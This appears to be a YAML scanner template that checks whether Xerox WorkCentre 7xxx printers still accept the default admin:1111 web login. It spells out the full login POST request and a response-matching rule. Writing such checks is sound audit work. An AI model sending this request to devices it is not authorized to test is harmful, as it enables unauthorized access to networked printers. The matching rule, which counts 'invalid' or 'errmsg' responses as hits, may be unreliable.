id: xerox-workcentre7-default-password

info:
  name: Xerox WorkCentre 7xxx - Default Login
  author: MiroslavSotak
  severity: high
  verified: false
  description: Testing default credentials admin:1111 on Xerox WorkCentre 7xxx printer.

rules:
  r0:
    request:
      method: POST
      path: /userpost/xerox.set
      body: _fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername=admin&webPassword=1111&frmaltDomain=default
    expression: response.status == 200 && response.body.bcontains(b'window.opener.top.location.pathname') && response.body.bcontains(b'Xerox Corporation')  && (response.body.bcontains(b'invalid') || response.body.bcontains(b'errmsg'))
expression: r0()